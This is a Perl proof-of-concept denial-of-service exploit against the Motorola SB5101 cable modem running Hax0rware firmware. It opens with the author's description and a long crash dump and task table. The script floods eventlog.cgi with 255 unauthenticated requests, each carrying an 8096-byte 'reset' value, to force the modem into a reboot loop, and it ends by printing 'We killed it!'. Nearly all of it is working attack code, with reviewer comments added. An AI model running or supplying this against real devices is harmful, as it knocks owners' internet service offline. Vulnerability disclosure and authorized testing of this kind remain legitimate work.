#!/usr/bin/perl
# Motorola SB5101 Hax0rware Event Reset Remote Overflow
# Tested on Hax0rware 1.1 R30, R32 and R39
# Author: Dillon Beresford
# Date: 6/6/2010
# Vendor: Motorola Corporation and SBHacker ( SBHacker has been notified of the vuln ).
# Software Link: http://www.sbhacker.net/forum/index.php
# Description: Motorola SB5101 Hax0rware Event Reset Remote Buffer Overflow
# An unauthenticated attacker could send multiple log reset requests to eventlog.cgi,
# causing a denial of service, which would send the cable modem into a reboot loop.
# For debugging, telnet into the device (192.168.100.1) and run the PoC; the output
# below is the resulting crash dump.
# >>> YIKES... looks like you may have a problem! <<<
# r0/zero=00000000 r1/at=80510000 r2/v0=00000000 r3/v1=00000002
# r4/a0=ac100102 r5/a1=00000000 r6/a2=00000001 r7/a3=8069b914
# r8/t0=00000001 r9/t1=00000000 r10/t2 =00000001 r11/t3 =00000000
# r12/t4 =00000000 r13/t5 =00000000 r14/t6 =00000000 r15/t7 =00000005
# r16/s0 =807bd04c r17/s1 =807bd004 r18/s2 =807bd000 r19/s3 =8069bb90
# r20/s4 =8069bb88 r21/s5 =11110015 r22/s6 =11110016 r23/s7 =11110017
# r24/t8 =00000000 r25/t9 =00000009 r26/k0 =807d2698 r27/k1 =8069bc7c
# r28/gp =80458fa0 r29/sp =8069b910 r30/fp =8069b970 r31/ra =80197d24
# PC : 0x80197e14  error addr: 0xac100102
# cause: 0x00000010  status: 0x1000ff03
# BCM interrupt enable: fffffff7, status: 00000000
# Instruction at PC: 0x8c830000
# entry 80197c58  called from 801dbe10
# entry 801dbd08  called from 80242f64
# entry 80242eb8  called from 802fb2e4
# entry 802fb2ac  called from 802fb2a4
# entry 802fb2ac  Return address (00000000) invalid.  Trace stops.
# Task: NetToMedia Thread # --------------------------------------------------- # ID: 0x0025 # Handle: 0x8069ba24 # Set Priority: 23 # Current Priority: 23 # State:SUSP # Stack Base: 0x8069a9b0 # Stack Size: 4096 bytes # Stack Used: 1088 bytes # Stack StackStack # TaskId TaskNamePriority StateSizeUsed Margin # ---------- ------------------------------------------------------------------------ # 0x8048f818 Idle Thread31 RUN 20481064 984 # 0x805131d0 Network alarm support 6 SLEEP 225612321024 # 0x804924c8 Network support 7 SLEEP 819218246368 # 0x80513f20pthread.0000080015EXIT 785211046748 # 0x8048a1c8tStartup18 SLEEP1228852087080 # 0x8054b9ac Rajko HttpD23 SLEEP 328021641116 # 0x807f579cNonVol Device Async Helper25 SLEEP 3072 5042568 # 0x807ebc7cMotorola Standby Switch Thread23 SLEEP 4096 4403656 # 0x807ea984Motorola Vendor Ctl Thread23 SLEEP 4096 5123584 # 0x807f64e8WDOG17 RUN 512027842336 # 0x807e8eb0 BFC Ping Thread29 SLEEP 6144 4765668 # 0x807e870c ConsoleThread27 RUN368642168 34696 # 0x807d6c58 TelnetD23 RUN 22562040 216 # 0x807ca564CfgVB Thread23 SLEEP 4096 5163580 # 0x807c5400DHCM25 SLEEP16384 516 15868 # 0x807bf390 Event25 SLEEP0 0 0 OVERFLOW # 0x8079a900Time Of Day Thread23 SLEEP 6144 4605684 # 0x8079ad70CmDocsisIpThread23 SLEEP 8192 5087684 # 0x80793edc CmBpiManagerThd25 SLEEP 8192 5127680 # 0x8079035c CmDsxHelper23 SLEEP 8192 5087684 # 0x807ac334 CmDocsisCtlThread21 SLEEP 8192 5167676 # 0x80789228Scan Downstream Thread23 SLEEP 409614162680 # 0x80786004RateShaping Thread23 SLEEP 4096 4483648 # 0x807f65e0CMHL23 SLEEP 4500 3724128 # 0x807f66d8CMHH21 SLEEP 4500 3564144 # 0x807f67d0ENRX23 SLEEP 450012483252 # 0x807f68c8ENTX23 SLEEP 4500 7883712 # 0x807f69c0ELNK23 SLEEP 4500 3244176 # 0x807f6ab8USTX23 SLEEP 4500 3444156 # 0x807f6bb0USRX23 SLEEP 4500 3764124 # 0x807f6ca8UBCT19 SLEEP 4500 3604140 # 0x807f6da0USRN23 SLEEP 4500 3444156 # 0x806a5e18DHCP Client Thread23 SLEEP12288 512 11776 # 0x807f6e98IpHalIst23 RUN 4500 8163684 # 0x8069ff7cCmPropaneCtlThread23 SLEEP 
819216326560 # 0x8069d320 IGMP Thread23 SLEEP 4096 4603636 # 0x8069ba24 NetToMedia Thread23SUSP 409610883008 # 0x8069798c Trap Thread23 SLEEP16384 504 15880 # 0x807f6030 SNMP Thread23 SLEEP204801196 19284 # 0x805aaf20DHCP Server Thread23 SLEEP 819214486744 # 0x8047b410tNonVolTimer30 SLEEP 2048 2921756 # * * #*** *** #*** *** #*** *** # ***** ***** # ***** ***** # ***** ***** #******* ******* #******* ******* #******* ******* # ********* ********* # ********* ********* # ******* ******* #********* #*** * *** #** ** # ** ** # ** ** #** ** #* * #MotorolaCorporation # +----------------------------------------------------------------------------+ # | _/_/ _/_/_/_/_/_/| # |_/_/ _/_/_/ Broadband | # | _/_/ _/_/| # |_/_/ _/_/_/_/ Foundation| # | _/_/ _/_/| # |_/ _/_/_/_/ Classes | # | _/_/_/ _/_/_/| # || # | Copyright (c) 1999 - 2007 Broadcom Corporation | # || # | Revision:3.9.33.3 RELEASE| # || # | Features:Console Nonvol Fat HeapManager SNMP Networking USB1.1 | # +----------------------------------------------------------------------------+ # | Standard Embedded Target Support for BFC | # || # | Copyright (c) 2003 - 2007 Broadcom Corporation | # || # | Revision:3.0.1 RELEASE | # || # | Features:PID=0xc011 Bootloader-Rev=2.1.6d| # | Copyright (c) 2003 - 2007 Broadcom Corporation | # || # | Revision:3.0.1 RELEASE | # || # | Features:PID=0xc011 Bootloader-Rev=2.1.6d| # | Features:Bootloader-Compression-Support=0x19 | # +----------------------------------------------------------------------------+ # | eCos BFC Application Layer | # || # | Copyright (c) 1999 - 2007 Broadcom Corporation | # || # | Revision:3.0.2 RELEASE | # || # | Features:eCos Console Cmds, (no Idle Loop Profiler)| # +----------------------------------------------------------------------------+ # | _/_/_/ _/| # |_/_/_/_/ _/_/ DOCSIS Cable Modem| # | _/_/_/ _/| # |_/_/ _/ | # | _/_/ _/| # |_/_/_/ _/ | # | _/_/_/ _/| # || # | Copyright (c) 1999 - 2005 Broadcom Corporation | # || # | Revision:3.9.33.3 RELEASE| 
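# ||
# | Features:AckCel(tm) DOCSIS 1.0/1.1/2.0 Propane(tm) CM SNMP w/Factory MIB |
# | Features:Support CM Vendor Extension |
# +----------------------------------------------------------------------------+
# | Motorola Data-Only CM Vendor Extension |
# ||
# | Revision:3.0.0a RELEASE|
# ||
# | Features:DHCP ServerHTTP Server|
# +----------------------------------------------------------------------------+
# | Build Date:Apr 29 2009 |
# | Build Time:15:08:51|
# | Built By:vobadm02|
# +----------------------------------------------------------------------------+

use strict;
use warnings;
use LWP::Simple;

# Denial-of-service proof of concept: floods eventlog.cgi on the modem's
# LAN-side management interface with oversized "reset" requests. Per the
# header, the Hax0rware firmware accepts these unauthenticated; the crash dump
# and task table above show the Event thread's stack marked OVERFLOW and the
# NetToMedia thread suspended on a bad load from 0xac100102.
#
# NOTE(review): this reboots the target. Run it only against a device you are
# authorized to test.

# Target host. The original hard-coded the SB5101's default management address
# 192.168.100.1; an optional first argument overrides it.
my $target = defined $ARGV[0] && length $ARGV[0] ? $ARGV[0] : '192.168.100.1';

# Oversized value for the "reset" query parameter: 8096 bytes of "1", exactly
# what the original PoC sent.
my $junk = "\x31" x 8096;

print "+---------------------------------------------------------------+\n"
    . "| Motorola SB5101 Hax0rware Event Reset Remote Overflow |\n"
    . "| Motorola: SB5101-2.7.6.0-GA-00-NOSH |\n"
    . "| Version: 1.1 R30, R32 and R39 |\n"
    . "| Vendor: Motorola Corporation and SBHacker |\n"
    . "| Author: Dillon Beresford|\n"
    . "| Date: 6/6/2010|\n"
    . "+---------------------------------------------------------------+\n";

# 255 requests back to back, as in the original (loop was 1 .. 255). No
# pacing: the point is to queue log resets faster than the modem drains them.
my $url = "http://$target/eventlog.cgi?reset=$junk";
for my $attempt ( 1 .. 255 ) {
    print "sending request to cable modem\n";
    my $contents = get($url);

    # LWP::Simple::get returns undef when the request fails. Once the modem
    # starts rebooting this is expected; report it but keep sending, matching
    # the original's fire-and-forget behaviour rather than aborting.
    print "  no response on request $attempt (modem may already be rebooting)\n"
        unless defined $contents;
}

print "We killed it!\n";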